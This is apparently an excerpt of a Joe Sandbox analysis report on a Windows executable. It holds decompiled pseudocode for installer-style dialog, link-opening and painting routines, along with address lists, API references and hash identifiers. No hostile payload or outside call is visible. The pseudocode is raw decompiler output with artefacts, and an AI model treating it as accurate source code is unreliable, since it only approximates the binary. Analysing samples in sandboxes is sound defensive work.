										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42cdf8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x0040690a
0x00406912
0x00406916
0x00406918
0x0040691b
0x0040691d
0x0040691d
0x0040691f
0x00406926
0x00406928
0x00406928
0x0040692e
0x00406943
0x0040694b
0x0040694d
0x0040694f
0x00406952
0x00406953
0x00406953
0x00406959
0x00000000
0x00000000
0x0040695b
0x0040695e
0x00000000
0x00000000
0x00000000
0x0040695e
0x00406962
0x00406965
0x00406967
0x00406967
0x0040696a
0x00406970
0x00406971
0x00000000
0x00000000
0x00000000
0x00406971
0x00406976
0x00406979
0x0040697b
0x0040697b
0x00406981
0x00406983
0x00406994
0x00406987
0x0040698b
0x00406c30
0x00000000
0x00406c30
0x00406991
0x00406992
0x00406992
0x0040699a
0x0040699d
0x004069a1
0x004069a3
0x004069a5
0x004069a8
0x00000000
0x00000000
0x004069b0
0x004069b6
0x004069b8
0x004069ba
0x004069bb
0x004069d0
0x004069d0
0x004069d3
0x004069d5
0x004069d5
0x004069d7
0x004069dc
0x004069de
0x004069e5
0x004069e7
0x004069ef
0x004069ef
0x004069f1
0x004069f2
0x00406a01
0x00406a05
0x00406a09
0x00406a0c
0x00406a0f
0x00406a14
0x00406a17
0x00406a1d
0x00406a24
0x00406a2a
0x00406c23
0x00406c23
0x00406c28
0x00406c37
0x00000000
0x00000000
0x00000000
0x00406c28
0x00406a37
0x00406a3a
0x00406a3d
0x00406a40
0x00406a44
0x00000000
0x00000000
0x00406a4f
0x00406a52
0x00406a53
0x00406a55
0x00406a5b
0x00406a5e
0x00000000
0x00000000
0x00406a64
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a74
0x00406a76
0x00406a76
0x00406a7e
0x00406a82
0x00406a87
0x00406aac
0x00406ab2
0x00406ab4
0x00406ab6
0x00406ab9
0x00406ac2
0x00000000
0x00000000
0x00406a89
0x00406a89
0x00406a92
0x00406a96
0x00000000
0x00000000
0x00406aa7
0x00406aa7
0x00406aaa
0x00000000
0x00000000
0x00406a9a
0x00406a9d
0x00406a9f
0x00406aa3
0x00000000
0x00000000
0x00406aa5
0x00406aa5
0x00000000
0x00406aa7
0x00406acb
0x00406ad1
0x00406adb
0x00406add
0x00406ae2
0x00406ae4
0x00406b1a
0x00406ae6
0x00406ae6
0x00406ae9
0x00406aec
0x00406af6
0x00406af9
0x00406b00
0x00406b0b
0x00406b12
0x00406b12
0x00406b1c
0x00406b1f
0x00406b21
0x00406b27
0x00406b27
0x00406b30
0x00406b33
0x00406b38
0x00406b47
0x00406b4f
0x00406b54
0x00406b78
0x00406b80
0x00406b84
0x00406b8a
0x00406b56
0x00406b64
0x00406b67
0x00406b6d
0x00406b6d
0x00406b8e
0x00406b49
0x00406b49
0x00406b49
0x00406b9f
0x00406ba3
0x00406baf
0x00406baa
0x00406bad
0x00406bad
0x00406bb7
0x00406bbc
0x00406bc4
0x00406bc0
0x00406bc2
0x00406bc2
0x00406bca
0x00406bcc
0x00406bd3
0x00406bdd
0x00406be7
0x00406c03
0x00406c07
0x00406a4c
0x00406a52
0x00406a53
0x00406a55
0x00406a5b
0x00406a5e
0x00000000
0x00000000
0x00000000
0x00406a5e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406be9
0x00406be9
0x00406be9
0x00406bee
0x00406bf7
0x00406c00
0x00000000
0x00406c00
0x00406c0d
0x00406c0d
0x00406c10
0x00406c17
0x00406c1a
0x00000000
0x00406a3d
0x004069bd
0x004069bf
0x004069bf
0x004069c3
0x004069c6
0x004069c7
0x004069c7
0x00000000
0x004069bf
0x00406933
0x00406939
0x00000000

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b751e5aff08849ce342a749075ab7f0bf0a9efd73ac853bc595c300a3c4f69bb
Instruction ID: ce73a9d55fc041a401e528a6b0bed7c2fc314d3430b7e91baefc2d4226deaab1
Opcode Fuzzy Hash: b751e5aff08849ce342a749075ab7f0bf0a9efd73ac853bc595c300a3c4f69bb
Instruction Fuzzy Hash: 51C13A71A002698BDF14CF68C4905EEB7B2FF99314F26827AD856B7380D7346952CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004038EB Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004038EB(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x429fc4 = _t35;
					if(_t115 == 0x110) {
						 *0x42eb68 = _t125;
						 *0x429fd8 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x428fa0 = _t91;
						E00403DBE(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e348);
						 *0x42e32c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x429fc4 = 1;
					}
					_t122 =  *0x4091a4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42eb80;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E0A(0x40b);
						while(1) {
							_t37 =  *0x429fc4;
							 *0x4091a4 =  *0x4091a4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091a4; // 0xffffffff
							__eflags = _t39 -  *0x42eb84;
							if(_t39 ==  *0x42eb84) {
								E0040140B(1);
							}
							__eflags =  *0x42e32c - _t133;
							if( *0x42e32c != _t133) {
								break;
							}
							__eflags =  *0x4091a4 -  *0x42eb84; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405A2E(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403DBE(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403DBE(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403DBE(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ebec - _t133;
							_v32 = _t49;
							if( *0x42ebec != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403DE0(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x428fa0, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ebec - _t133;
							if( *0x42ebec == _t133) {
								_push( *0x429fd8);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x428fa0);
							}
							E00403DF3();
							E00405A0C(0x429fe0, 0x42e360);
							E00405A2E(0x429fe0, _t125, _t130,  &(0x429fe0[lstrlenA(0x429fe0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x429fe0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e338);
									 *0x4297b0 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42eb60,  *_t130 +  *0x42e340 & 0x0000ffff, _t125,  *(0x4091a8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e338 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403DBE(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e338, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e32c - _t133;
									if( *0x42e32c != _t133) {
										goto L61;
									}
									ShowWindow( *0x42e338, 8);
									E00403E0A(0x405);
									goto L58;
								}
								__eflags =  *0x42ebec - _t133;
								if( *0x42ebec != _t133) {
									goto L61;
								}
								__eflags =  *0x42ebe0 - _t133;
								if( *0x42ebe0 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e338);
						 *0x42eb68 = _t133;
						EndDialog(_t125,  *0x4293a8);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e338, 0x40f, 0, 1);
						__eflags =  *0x42e32c;
						return 0 |  *0x42e32c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x429fb8, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x429fb8,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E25(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e338, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ebec - _t133;
										if( *0x42ebec == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x4293a8 = 1;
											L21:
											_push(0x78);
											L22:
											E00403D97();
											goto L26;
										}
										E0040140B(_t127);
										 *0x4293a8 = _t127;
										goto L21;
									}
									__eflags =  *0x4091a4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e338);
						 *0x42e338 = _a12;
						L58:
						if( *0x42afe0 == _t133 &&  *0x42e338 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x42afe0 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x004038f4
0x004038fd
0x00403a3e
0x00403a42
0x00403a46
0x00403a48
0x00403a4d
0x00403a58
0x00403a63
0x00403a68
0x00403a6a
0x00403a6c
0x00403a6f
0x00403a74
0x00403a82
0x00403a8f
0x00403a96
0x00403a96
0x00403a97
0x00403a97
0x00403a9c
0x00403aa2
0x00403aa9
0x00403aaf
0x00403ab1
0x00403af1
0x00403af6
0x00403afb
0x00403afb
0x00403b00
0x00403b09
0x00403b0b
0x00403b10
0x00403b16
0x00403b1a
0x00403b1a
0x00403b1f
0x00403b25
0x00000000
0x00000000
0x00403b30
0x00403b36
0x00000000
0x00000000
0x00403b3f
0x00403b47
0x00403b4c
0x00403b4f
0x00403b55
0x00403b5a
0x00403b5d
0x00403b63
0x00403b68
0x00403b6b
0x00403b71
0x00403b79
0x00403b7f
0x00403b85
0x00403b89
0x00403b90
0x00403b90
0x00403b90
0x00403b9a
0x00403bac
0x00403bb8
0x00403bbd
0x00403bc7
0x00403bcd
0x00403bcf
0x00403bd4
0x00403bd1
0x00403bd1
0x00403bd1
0x00403be4
0x00403bfc
0x00403bfe
0x00403c04
0x00403c19
0x00403c06
0x00403c0f
0x00403c11
0x00403c11
0x00403c1f
0x00403c2f
0x00403c40
0x00403c47
0x00403c4d
0x00403c51
0x00403c56
0x00403c58
0x00000000
0x00403c5e
0x00403c5e
0x00403c60
0x00000000
0x00000000
0x00403c66
0x00403c6a
0x00403c8f
0x00403c95
0x00403c9b
0x00403c9d
0x00000000
0x00000000
0x00403cc3
0x00403cc9
0x00403ccb
0x00403cd0
0x00000000
0x00000000
0x00403cd6
0x00403cd9
0x00403cdc
0x00403cf3
0x00403cff
0x00403d18
0x00403d1e
0x00403d22
0x00403d27
0x00403d2d
0x00000000
0x00000000
0x00403d37
0x00403d42
0x00000000
0x00403d42
0x00403c6c
0x00403c72
0x00000000
0x00000000
0x00403c78
0x00403c7e
0x00000000
0x00000000
0x00000000
0x00403c84
0x00403c58
0x00403d4f
0x00403d5b
0x00403d62
0x00000000
0x00403ab3
0x00403ab3
0x00403ab6
0x00403ae9
0x00403ae9
0x00403aeb
0x00000000
0x00000000
0x00000000
0x00403aeb
0x00403ab8
0x00403abc
0x00403ac1
0x00403ac3
0x00000000
0x00000000
0x00403ad3
0x00403adb
0x00000000
0x00403ae1
0x0040390f
0x0040390f
0x00403913
0x00403918
0x00403927
0x00403927
0x00403930
0x00403939
0x00403944
0x00403944
0x00403950
0x0040396c
0x0040396f
0x00403982
0x00403988
0x00403a2b
0x00000000
0x00403a34
0x0040398e
0x0040399b
0x0040399d
0x0040399f
0x004039be
0x004039be
0x004039c1
0x004039c6
0x004039c9
0x004039d9
0x004039da
0x004039dc
0x00403a12
0x00403a25
0x00000000
0x00403a25
0x004039de
0x004039e4
0x004039fd
0x00403a02
0x00403a04
0x00000000
0x00000000
0x00403a06
0x004039f2
0x004039f2
0x004039f4
0x004039f4
0x00000000
0x004039f4
0x004039e7
0x004039ec
0x00000000
0x004039ec
0x004039cb
0x004039d1
0x00000000
0x00000000
0x004039d3
0x00000000
0x004039d3
0x004039c3
0x00000000
0x004039c3
0x004039a9
0x004039b0
0x004039b6
0x004039b8
0x00000000
0x00000000
0x00000000
0x004039b8
0x00403974
0x00000000
0x00403952
0x00403958
0x00403962
0x00403d68
0x00403d6e
0x00403d7b
0x00403d81
0x00403d81
0x00403d8b
0x00000000
0x00403d8b
0x00403950

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403927
ShowWindow.USER32(?), ref: 00403944
DestroyWindow.USER32 ref: 00403958
SetWindowLongA.USER32 ref: 00403974
GetDlgItem.USER32 ref: 00403995
SendMessageA.USER32 ref: 004039A9
IsWindowEnabled.USER32(00000000), ref: 004039B0
GetDlgItem.USER32 ref: 00403A5E
GetDlgItem.USER32 ref: 00403A68
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A82
SendMessageA.USER32 ref: 00403AD3
GetDlgItem.USER32 ref: 00403B79
ShowWindow.USER32(00000000,?), ref: 00403B9A
EnableWindow.USER32(?,?), ref: 00403BAC
EnableWindow.USER32(?,?), ref: 00403BC7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403BDD
EnableMenuItem.USER32 ref: 00403BE4
SendMessageA.USER32 ref: 00403BFC
SendMessageA.USER32 ref: 00403C0F
lstrlenA.KERNEL32(00429FE0,?,00429FE0,0042E360), ref: 00403C38
SetWindowTextA.USER32(?,00429FE0), ref: 00403C47
ShowWindow.USER32(?,0000000A), ref: 00403D7B

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 0b6e4c35b8dcfffa61f252a23bc82b09b6935cd656e84c2cc0fc3574caf64574
Instruction ID: 552f9e5d3371f53337095c5be2d86efa37a563823f2766eb5c4291c6ef6876bd
Opcode Fuzzy Hash: 0b6e4c35b8dcfffa61f252a23bc82b09b6935cd656e84c2cc0fc3574caf64574
Instruction Fuzzy Hash: B8C1B171604204AFD721AF62ED85E2B7F6CEB44706F40053EF941B51E1C779A942DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F06 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00403F06(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429fc0 =  *0x429fc0 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E25(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42db00;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42eb68, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42eb68, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429fc0 != 0) {
						goto L25;
					} else {
						_t112 =  *0x4297b0 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DE0(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404191();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42e33c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42eb98;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403ED2;
				E00403DBE(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403DBE(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DE0( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DF3(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42eb70 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x428fa4 =  *0x428fa4 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429fc0 =  *0x429fc0 & 0x00000000;
				return 0;
			}

0x00403f16
0x0040403c
0x00404098
0x0040409c
0x00404173
0x00404175
0x00404175
0x0040417b
0x0040417b
0x0040417e
0x00000000
0x00404185
0x004040aa
0x004040ac
0x004040b6
0x004040c1
0x004040c4
0x004040c7
0x004040d2
0x004040d5
0x004040dc
0x004040ea
0x00404102
0x00404115
0x00404125
0x00404127
0x00404127
0x004040dc
0x00404131
0x00000000
0x0040413c
0x00404140
0x00404151
0x00404151
0x00404157
0x00404165
0x00404165
0x00000000
0x00404169
0x00404131
0x00404047
0x00000000
0x0040405b
0x00404061
0x00404067
0x00000000
0x00000000
0x0040408c
0x0040408e
0x00404093
0x00000000
0x00404093
0x00404047
0x00403f1c
0x00403f1f
0x00403f24
0x00403f35
0x00403f35
0x00403f3c
0x00403f3f
0x00403f41
0x00403f46
0x00403f4f
0x00403f55
0x00403f61
0x00403f64
0x00403f6d
0x00403f72
0x00403f75
0x00403f7a
0x00403f91
0x00403f98
0x00403fab
0x00403fae
0x00403fc3
0x00403fca
0x00403fcf
0x00403fd4
0x00403fd4
0x00403fe3
0x00403ff2
0x00403ff4
0x0040400a
0x00404019
0x0040401b
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F91
GetDlgItem.USER32 ref: 00403FA5
SendMessageA.USER32 ref: 00403FC3
GetSysColor.USER32(?), ref: 00403FD4
SendMessageA.USER32 ref: 00403FE3
SendMessageA.USER32 ref: 00403FF2
lstrlenA.KERNEL32(?), ref: 00403FFC
SendMessageA.USER32 ref: 0040400A
SendMessageA.USER32 ref: 00404019
GetDlgItem.USER32 ref: 0040407C
SendMessageA.USER32 ref: 0040407F
GetDlgItem.USER32 ref: 004040AA
SendMessageA.USER32 ref: 004040EA
LoadCursorA.USER32 ref: 004040F9
SetCursor.USER32(00000000), ref: 00404102
ShellExecuteA.SHELL32(0000070B,open,0042DB00,00000000,00000000,00000001), ref: 00404115
LoadCursorA.USER32 ref: 00404122
SetCursor.USER32(00000000), ref: 00404125
SendMessageA.USER32 ref: 00404151
SendMessageA.USER32 ref: 00404165

Strings

N, xrefs: 00404098
open, xrefs: 0040410D

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$open
API String ID: 3615053054-904208323
Opcode ID: ca9ac3b64147b6f3934cc3f9d65700a8f1bf1296ace46b7c3bfa8303cb2a33ee
Instruction ID: 0605a8af88f24b8a239437e517aaa265f180be2417519ff34b25117700073a86
Opcode Fuzzy Hash: ca9ac3b64147b6f3934cc3f9d65700a8f1bf1296ace46b7c3bfa8303cb2a33ee
Instruction Fuzzy Hash: D161C1B1A40209BBEB109F60DD45F6A3B69FF54715F108036FB01BA2D1C7B8A991CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42eb70;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
